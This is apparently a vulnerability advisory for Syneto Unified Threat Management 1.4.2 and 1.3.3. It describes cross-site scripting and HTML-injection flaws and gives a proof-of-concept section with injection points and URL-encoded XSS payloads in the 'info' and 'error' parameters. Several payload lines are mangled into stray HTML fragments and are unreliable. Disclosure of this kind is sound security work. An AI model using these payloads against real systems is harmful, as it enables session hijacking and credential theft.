source: https://www.securityfocus.com/bid/51597/info

Syneto Unified Threat Management is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.

Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are possible.

Unified Threat Management 1.4.2 and 1.3.3 Community Edition are vulnerable; other versions may be affected.

Proof of Concept:
=================
The vulnerabilities can be exploited by privileged user accounts, low-privileged viewers, or remote attackers with the required user interaction.

For demonstration or reproduce ...

1.1.1 [+] Reports - Executive Summary - Output Listing

Category disable ">' <<="" td=""> Edit < ;img src="img/delete.gif" title="Delete" alt="Delete" />

Reference(s): https://www.example.com.com/syneto.php?menuid=307

1.1.2 [+] EMail - Filter Add & Configure
Sender = >".*
Receiver = .*
Subject = .*(SPAM|VIAGRA).*
Reference(s): https://www.example.com.com/syneto.php?menuid=63

1.1.3 [+] EMail Settings - New Domain

">

Reference(s): https://www.example.com.com/syneto.php?menuid=60

1.2 PoC:
https://www.example.com.com/index.php?error=need_login"'>
&from_menu=238
https://www.example.com.com/index.php?info=%3Cimg%20src=%22%3Cimg%20src=search%22/onerror=alert(%22vulnerabilitylab%22)//%22%3E

Reference(s):
https://www.example.com.com/index.php?error=need_login"'>EXECUTION OF PERSISTENT SCRIPT CODE!
&from_menu=238
https://www.example.com.com/index.php?info=%20%3E
Status Domain Routing Verify sender Send digest Actions
" type="hidden"> " /> ">